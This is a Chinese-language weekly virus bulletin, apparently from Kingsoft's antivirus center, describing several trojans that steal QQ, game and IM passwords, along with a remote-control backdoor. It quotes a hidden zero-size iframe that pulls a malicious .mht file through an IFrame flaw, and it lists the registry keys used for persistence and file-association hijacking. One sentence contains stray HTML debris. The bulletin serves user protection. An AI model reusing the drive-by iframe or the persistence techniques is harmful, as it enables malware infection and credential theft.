金山反病毒应急中心本周进行升级包的更新，请用户尽快到金山毒霸网站duba.net 下载升级包，以下是几个重要病毒的简介：

　　一. 本周热门病毒：

　　QQ信息 Trojan.qqmsgk163 ★★★ 传播方式：文件 网络

　　这个病毒会利用QQ的发送信息窗口发送信息，骗取用户的网友访问某网址。

　　病毒功能简介

　　1. 该木马会把自己注册为服务。

　　2. 设置默认主页为http://www.k163.com。

　　3. 生成文件: intrenet.exe windows.exe

　　4. 在注册表里添加键值，并定时对注册表进行修改,防止用户修改回去.

　　5. 向QQ"发送消息"向QQ窗口发送"向你推荐一个网站http;//www.k163.com是我朋友做的,精彩哦!"并自动发送出去。

　　7. 如果访问http://www.k163.com, 首页中文件尾部有如下代码<iframe src=http://www.k163.com/love.mht width=0 height=0></iframe>，它会让计算机自动下载并打开love.mht文件, 这个文件利用了IFrame漏洞,会自动运行其中的附件, 这个附件就是上面介绍的这个病毒。

　　金山毒霸提醒大家注意防范，不要随便点击陌生的文件或链接，尽快升级您的杀毒软件。

　　二. 本周重点关注病毒：

　　血火 Trojan.RedBlood21 ★★★ 传播方式：文件 网络

　　该木马通过记录键盘输入的信息以获得帐号、Frethem/index.htm" target="_blank" style='text-decoration: underline;color: #0000FF'>密码，并可以使用FTP或邮箱两种方式接受收盗取的信息。它通过插入PE文件的方式（类似PE感染型病毒的方法）绑定到指定的游戏或即时通讯工具中，当用户使用这些工具时，其帐号密码就被记录下来。

　　由于上边这种方式，所以该木马可以盗取某个用户常用工具的帐号、密码，比如：精灵、QQ、联众、边锋等。

　　“茶苑”盗取者 Trojan.GameTea.txt ★★ 传播方式： 文件 网络

　　这是一个试图盗取游戏“茶苑” 帐号和密码的木马。

　　该木马通过修改如下注册表键值：

　　HKLM\System\CurrentControlSet\Control\Keyboard Layouts

　　HKLM\Software\Gametea\Game\Room

　　HKCR\txtfile\shell\open\command

　　HKCR\inifile\shell\open\command

　　这样当游戏者打开文本文件时该病毒就会运行，并试图将获取的帐号密码发送到指定信箱。

　　广外男生新变种 Hack.gwboy2003 ★★★ 传播方式：文件 网络

　　远程控制及网络监控的木马,除了具备普通木马的功能外还有自己的新特色：

　　1.病毒利用dll插入线程寄生到Windows系统进程(如explorer)中，本身没有单独进程。

　　2.复制自身到system32目录下，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加自己。复制寄生到进程的一个DLL到system32目录下，随机写入注册表，位置不固定，重启之后随系统进程启动自身。

　　3.打开系统后门，主动连接客户端，客户端对被控制的机器有很高的权限。

　　金山毒霸提醒大家注意防范木马，避免自己受到不必要的伤害。

　　如发现可疑文件，请email至:virus@kingsoft.net

　　数据修复急救，请email至:sos@kingsoft.net